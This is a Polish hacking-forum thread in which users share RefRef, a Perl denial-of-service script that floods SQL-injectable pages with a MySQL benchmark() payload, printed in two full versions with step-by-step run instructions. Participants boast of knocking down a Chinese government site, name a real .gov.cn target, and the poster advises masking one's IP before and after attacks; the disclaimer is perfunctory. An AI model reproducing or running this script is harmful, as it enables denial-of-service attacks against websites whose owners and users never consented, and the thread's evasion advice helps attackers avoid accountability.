RefRef 1.3.1 DoS

[VR8]

=======================================
Nie ponosze odpowiedzialnosci za skutki dzialania tego skryptu
--------------------------------------------------
Webloic is only intented for web-server load testing (your OWN web-server), do not use it for large distributed denial of service attacks.

DDos may severely harm a business by causing a site to slow down or go down completely.

Causing harm can lead into lawsuits on behalf of the victim.

Discretion is adviced.
======================================
#RefRef zaprogramowany w Perl:

#!usr/bin/perl
#RefRef 1.3.1 (C) Anonymous & NetSec 2011

use LWP::UserAgent;
use Net::Ping;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " AUTHORIZATION...\n";
my $auth = Net::Ping->new("icmp", 1, 64);
if ($auth->ping ($_[0])) {
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
my $ver = Net::Ping->new("icmp", 1, 64);
if ($ver->ping ($_[0])) {
print " ERROR\n";
} else {
print " OWNED\n";
}
copyright();
}}} else { 
print " ERROR\n";
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}

RefRef 1.3.1 ;

 

[michal31337]

Może opisz co to robi, jak tego uzywac? Ja tam perla nie znam, a skryptu "na ślepo" nie mam po co odpalać. x(

 

[VR8]

Może opisz co to robi, jak tego uzywac? Ja tam perla nie znam, a skryptu "na ślepo" nie mam po co odpalać. x(

Co robi? - oto nowa słynna broń Anonymous #RefRef. ( WERSJA 1.3.1 STWORZONA Z POMOCA NetSec )
Potrafi w niecałe 10 sekund zgnieść serwery / strony internetowe. Sprawia że strona atakuje sama siebie przez co jest pewność działania. To taki SQLi_DOS

Opyla się znać podstawy wszystkich używanych języków, nie koniecznie pisać w nich programy

Znajdujesz błąd SQLi Vulnerability, zapisz RefRef na dysu C jako " RefRef.pl " ROZSZERZENIE = PL

Włączasz CMD i klepiesz:
C:\RefRef.pl http://cel.pl/blad.php?sql=1'

 

[michal31337]

Grubo :d

Opyla się znać podstawy wszystkich używanych języków, nie koniecznie pisać w nich programy

Zgadzam się. W moim przypadku na perla kiedyś też przyjdzie czas, lecz jeszcze nie dziś.
Pora przetestować

 

[djmentos]

Co robi? - oto nowa słynna broń Anonymous #RefRef

Zbyt wyrafinowana to ona nie jest.

 

[VR8]

Zbyt wyrafinowana to ona nie jest.

Ale robi swoje. Też się zdziwiłem jak to zobaczyłem, myślałem o jakimś wypasie ale muszę przyznać, jak pierwszy raz to włączyłem to mi szczęka opadła.

 

[djmentos]

Zwykłe użycie funkcji benchmark() co możliwe zapytanie. To logiczne, że będzie działać. Ale na Waszym miejscu uważałbym z używaniem tego na lewo i prawo, bo pamiętaj, że gratis wysyłany jest Twój adres IP. No chyba, że odpowiednio o to zadbaliście.

 

[VR8]

Zwykłe użycie funkcji benchmark() co możliwe zapytanie. To logiczne, że będzie działać. Ale na Waszym miejscu uważałbym z używaniem tego na lewo i prawo, bo pamiętaj, że gratis wysyłany jest Twój adres IP. No chyba, że odpowiednio o to zadbaliście.

Oczywiście. Jak napisałem (cytat) ostrzegam że używacie tego na własną odpowiedzialność, zaleca się dyskrecję a użycie może doprowadzić do procesów sądowych ze strony ofiary.

Można też użyć tej 'trutki' przez przeglądarkę, używając proxy. Kod który wstawiłem to tylko interfejs do tej komendy, dla mniej zaawansowanych.


W wersji #RefRef 1.4.? będzie ukrywane IP i kilka funkcji, ale potrzebny jest pierwsze pomysł jak to dobrze zrobić, i przede wszystkim troszkę czasu.

PS. Jest kilka wersji RefRef

Perl, 1.0.1 - 1.3.1
Python, 1.0.1
Javascript, 1.0.1 + funkcja ukrywania IP (Proxy)

A i nie używamy tego na prawo i lewo, tylko testy na wirtualych maszynach, darmowe hostingi, aż do pełnej anonimowości, czyli 1.4.0/1.4.1 lub 1.5.0/1.5.1

 

[michal31337]

Pewna chińska strona rządowa PRZED...

Chińska strona rządowa PO...

Oceniam że działa :]

 

[ShutteR]

Włączasz CMD i klepiesz:
C:\RefRef.pl http://cel.pl/blad.php?sql=1'

Jaka jest zasada podawania drugiej części adresu? Tą część: blad.php?sql=1 mogę skopiować z dowolnej podstrony ?

 

[trojanxem]

Michal31337 wow!
Czas przetestowac...

 

[VR8]

Jaka jest zasada podawania drugiej części adresu? Tą część: blad.php?sql=1 mogę skopiować z dowolnej podstrony ?

Jest to zmienna GET w pliku który przykładowo nazwałem blad.php
Strona jest podatna w 45% przypadkach, gdy w zmiennej GET jest zapytanie do MySQL.

Podstawy PHP.

 

[pro+moc=ja]

Witam.
Nie bardzo rozumiem dlaczego pojawia sie problem z autoryzacja:

 

[VR8]

Witam.
Nie bardzo rozumiem dlaczego pojawia sie problem z autoryzacja:
View attachment 161

Nie wiem czemu ale na "nowszych" stronach skrypt szwankuje. Trzymaj starszą wersję:

#!usr/bin/perl
#RefRef 1.2.0 (C) VR Eight & Anonymous 2011

use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print " OWNED\n";
}
copyright();
} else { 
print " ERROR\n";
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}

 

[pro+moc=ja]

Dzieks wielke za odzew, ale jest "nowy" problem:


pliki bat:

start /min test.bat
pause
boucle.bat

refref.pl http://ykzzb.gov.cn/info.php?id=176
test.bat

 

[VR8]

Dzieks wielke za odzew, ale jest "nowy" problem:
View attachment 162

pliki bat:

Uruchom przez CMD wpisz "ścieżka refref.pl cel.com"

Lepiej daj sobie spokój z atakowaniem stron .gov, bo jak cie namierzą to szkoda gadać...
Ja na Twoim miejscu pilnował bym się nawet przy zwykłych stronach .pl, .com, itd.
Radzę też zmienić, zamaskować IP przed jakimkolwiek atakiem, i znów zmienić po ataku.

PS. strona chyba nie ma błędu SQLi.

 

[sich]

Zapisuje skrypt na C: jako refref.pl nastepnie odpalam cmd i wpisuje C:\refref.pl nazwastrony.pl i enter? bo mi wyskakuje takie cos...

 

[michal31337]

Co do DDoSa - ktoś ładnie sieknął wczoraj forum, cały dzień leżało.
Widziałem, że Wykop.pl też DDoSowali, pare razy w ciągu dnia padał na 15-30 minut.

Ciekawe czy robiła to ta sama osoba.

 

[pro+moc=ja]

Uruchom przez CMD wpisz "ścieżka refref.pl cel.com"

Lepiej daj sobie spokój z atakowaniem stron .gov, bo jak cie namierzą to szkoda gadać...
Ja na Twoim miejscu pilnował bym się nawet przy zwykłych stronach .pl, .com, itd.
Radzę też zmienić, zamaskować IP przed jakimkolwiek atakiem, i znów zmienić po ataku.

PS. strona chyba nie ma błędu SQLi.

W zadnym wypadku nie mam zamiaru uzywac owego programu do "random ddos", sciaglem go wylacznie w celach "edukacyjnych". Po odpaleniu poprzez cmd dalej te same bledy.

 

[michal31337]

Jaki error? Może nie zauważyłeś, ale nie da się otwierać zdjęć wrzuconych w sposób, w który ty to zrobiłeś. Wrzuć na imgur.com